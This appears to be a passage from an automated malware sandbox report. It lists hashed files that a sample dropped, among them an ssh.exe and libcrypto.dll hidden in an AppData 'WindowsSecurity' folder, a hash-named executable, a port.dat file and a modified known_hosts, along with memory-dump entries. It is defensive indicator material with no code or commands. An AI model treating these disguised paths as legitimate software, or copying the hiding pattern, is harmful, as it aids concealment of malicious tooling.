SHA256 2afb05a73ddb32ae71ebdc726a9956d844bf8f0deba339928ca8edce6427df71
SHA512 de44fff7a679138bae71103190ab450b17590df3c3dde466a54da80d2102a04fc6e12ad65448d9d935e01b577651121184b63133be6cb010aaa32d39786c740f

C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\libcrypto.dll

MD5 79a6e2268dfdba1d94c27f4b17265ff4
SHA1 b17eed8cb6f454700f8bfcfd315d5627d3cf741c
SHA256 6562ae65844bd9bb6d70908bfb67bc03e85053e6e0673457b0341a7ad5a957d5
SHA512 3ebe640a6395f6fbcfb28afe6383b8911f2d30847699dcbcbe1a0f5d9e090a9b7f714d5aa4e6a9891e72109edf494efaf0b7b2bb954e2763b1fbba2946c9723c

\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\libcrypto.dll

MD5 79a6e2268dfdba1d94c27f4b17265ff4
SHA1 b17eed8cb6f454700f8bfcfd315d5627d3cf741c
SHA256 6562ae65844bd9bb6d70908bfb67bc03e85053e6e0673457b0341a7ad5a957d5
SHA512 3ebe640a6395f6fbcfb28afe6383b8911f2d30847699dcbcbe1a0f5d9e090a9b7f714d5aa4e6a9891e72109edf494efaf0b7b2bb954e2763b1fbba2946c9723c

C:\Users\Admin\AppData\Local\Temp\Cab9262.tmp

MD5 f3441b8572aae8801c04f3060b550443
SHA1 4ef0a35436125d6821831ef36c28ffaf196cda15
SHA256 6720349e7d82ee0a8e73920d3c2b7cb2912d9fcf2edb6fd98f2f12820158b0bf
SHA512 5ba01ba421b50030e380ae6bbcd2f681f2a91947fe7fedb3c8e6b5f24dce9517abf57b1cf26cc6078d4bb53bde6fcfb2561591337c841f8f2cb121a3d71661b9

memory/2600-144-0x000007FEF53A0000-0x000007FEF5D8C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Tar939D.tmp

MD5 9441737383d21192400eca82fda910ec
SHA1 725e0d606a4fc9ba44aa8ffde65bed15e65367e4
SHA256 bc3a6e84e41faeb57e7c21aa3b60c2a64777107009727c5b7c0ed8fe658909e5
SHA512 7608dd653a66cd364392a78d4711b48d1707768d36996e4d38871c6843b5714e1d7da4b4cc6db969e6000cfa182bcb74216ef6823d1063f036fc5c3413fb8dcf

C:\Users\Admin\AppData\Local\WindowsSecurity\6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe

MD5 a43b860d290321de53ed6deb5cae95af
SHA1 62cc70d91f7e39fc93b9b0f106f78a90cfc54047
SHA256 6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538
SHA512 535cca5f0fdd3efecfca76760ab914b1c29ef7accc4e0789e5f658b1aa922fac854cfca752c745843c667d3be67672185973a79335496ef4b0a0f73d47c3b1a5

memory/2716-209-0x000007FEF53A0000-0x000007FEF5D8C000-memory.dmp

C:\Users\Admin\AppData\Local\w3bgb431s6\port.dat

MD5 4ebccfb3e317c7789f04f7a558df4537
SHA1 e5b088349a802b84e981bd16273875b3ea68bb0e
SHA256 893cb5b1a02d4dcada2c464508cc4e47b86f8f21185b6032d5a12cb3f1e4541a
SHA512 77b89093f4b8705948b070e56abe193fdc17c1bd8a9adc28a0b5f10886dc8ad528279496992b87eb1107b850e3a77475a9f6b250f3a5c761996e10173a9e1c19

C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\ssh.exe

MD5 d1ce628a81ab779f1e8f7bf7df1bb32c
SHA1 011c90c704bb4782001d6e6ce1c647bf2bb17e01
SHA256 2afb05a73ddb32ae71ebdc726a9956d844bf8f0deba339928ca8edce6427df71
SHA512 de44fff7a679138bae71103190ab450b17590df3c3dde466a54da80d2102a04fc6e12ad65448d9d935e01b577651121184b63133be6cb010aaa32d39786c740f

\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\libcrypto.dll

MD5 79a6e2268dfdba1d94c27f4b17265ff4
SHA1 b17eed8cb6f454700f8bfcfd315d5627d3cf741c
SHA256 6562ae65844bd9bb6d70908bfb67bc03e85053e6e0673457b0341a7ad5a957d5
SHA512 3ebe640a6395f6fbcfb28afe6383b8911f2d30847699dcbcbe1a0f5d9e090a9b7f714d5aa4e6a9891e72109edf494efaf0b7b2bb954e2763b1fbba2946c9723c

C:\Users\Admin\.ssh\known_hosts

MD5 18015a60cd12f33648facec1263cfafa
SHA1 31b7afd9a2dc51bfad694e5772d430fceedbac3f
SHA256 9ab8d1a229e05070a0364b5c5efd2ab1ddf676b0bc00314ec336bcdc00998190
SHA512 fcdb2e02f01c59916eaa08baeb74cc2f61eed6d96873f41a2299b752b9ec1af5db74a6eac6013c9a45a77d0bbc0431590f16fa74cff779eea97383e2fe073925

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 24e41fef3aa9b04cae1a38e4c2b863ac
SHA1 b2a905fde1f6f778fca66270e861c92c55078fc2
SHA256 4812b7652cfc4ce58559bbba0144cf9a462af28789aaa599e2a2c2ab6b159e90
SHA512 1ee9e4add5f91bd92dada987946a9f85e2d58763dd041ae293a2a48c3a358c754301b06abd07c971543bfb694441b18abcf1d0f53da0e031328b151b4c3ce0f1

memory/2716-232-0x000007FEF53A0000-0x000007FEF5D8C000-memory.dmp

memory/2716-233-0x000000001AD00000-0x000000001AD80000-memory.dmp